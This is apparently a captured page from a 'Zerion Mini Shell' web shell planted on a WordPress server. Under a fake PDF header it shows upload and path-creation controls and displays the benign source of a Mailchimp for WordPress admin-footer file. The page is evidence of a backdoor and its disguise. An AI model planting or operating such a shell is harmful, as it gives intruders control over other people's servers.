%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/itworks/wp-content/plugins/mailchimp-for-wp/includes/views/parts/
Upload File :
Create Path :
Current File : /var/www/html/itworks/wp-content/plugins/mailchimp-for-wp/includes/views/parts/admin-footer.php

<?php defined('ABSPATH') or exit;

/**
 * @ignore
 */
function _mc4wp_admin_translation_notice()
{

    // show for every language other than the default
    if (stripos(get_locale(), 'en_us') === 0) {
        return;
    }

    // TODO: Check translation progress from Transifex here. Only show when < 100.

    echo '<p class="help">' . sprintf(__('Mailchimp for WordPress is in need of translations. Is the plugin not translated in your language or do you spot errors with the current translations? Helping out is easy! Head over to <a href="%s">the translation project and click "help translate"</a>.', 'mailchimp-for-wp'), 'https://www.transifex.com/projects/p/mailchimp-for-wordpress/') . '</p>';
}

/**
 * @ignore
 */
function _mc4wp_admin_github_notice()
{
    if (strpos($_SERVER['HTTP_HOST'], 'local') !== 0 && ! WP_DEBUG) {
        return;
    }

    echo '<p class="help">Developer? Follow <a href="https://github.com/ibericode/mailchimp-for-wordpress">Mailchimp for WordPress on GitHub</a> or have a look at our repository of <a href="https://github.com/ibericode/mc4wp-snippets">sample code snippets</a>.</p>';
}

/**
 * @ignore
 */
function _mc4wp_admin_disclaimer_notice()
{
    echo '<p class="help">' . __('This plugin is not developed by or affiliated with Mailchimp in any way.', 'mailchimp-for-wp') . '</p>';
}

add_action('mc4wp_admin_footer', '_mc4wp_admin_translation_notice', 20);
add_action('mc4wp_admin_footer', '_mc4wp_admin_github_notice', 50);
add_action('mc4wp_admin_footer', '_mc4wp_admin_disclaimer_notice', 80);
?>

<div class="big-margin">

	<?php

    /**
     * Runs while printing the footer of every Mailchimp for WordPress settings page.
     *
     * @since 3.0
     */
    do_action('mc4wp_admin_footer'); ?>

</div>

Zerion Mini Shell 1.0